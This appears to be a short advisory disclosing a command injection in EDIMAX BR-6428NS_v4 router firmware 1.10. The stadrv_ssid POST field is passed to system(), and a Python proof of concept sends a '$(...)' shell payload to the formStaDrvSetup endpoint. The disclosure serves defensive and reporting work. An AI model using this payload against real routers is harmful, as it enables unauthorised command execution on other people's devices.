Overview

• The device's official website: https://www.edimax.com/edimax/download/download/data/edimax/global/download/wireless_routers_n300/br-6428ns_v4

Affected version

BR-6428NS_v4_1.10

Vulnerability details

The EDIMAX BR-6428NS_v4_1.10 firmware has a command injection vulnerability in the formStaDrvSetup function. The v11 variables receive the stadrv_ssid parameters from a POST request. However, since the user can control the input of these variables, the statement system() can cause a command injection.

POC

import requests

ip = "192.168.2.1"

payload = "$(ps>/1.txt)"
data = {
    "stadrv_type": "1",
    "stadrv_band": "1",
    "stadrv_chan": "19",
    "stadrv_ssid": payload
}
url = f'http://{ip}/goform/formStaDrvSetup'

res = requests.post(url=url, data=data, verify=False)
print(res)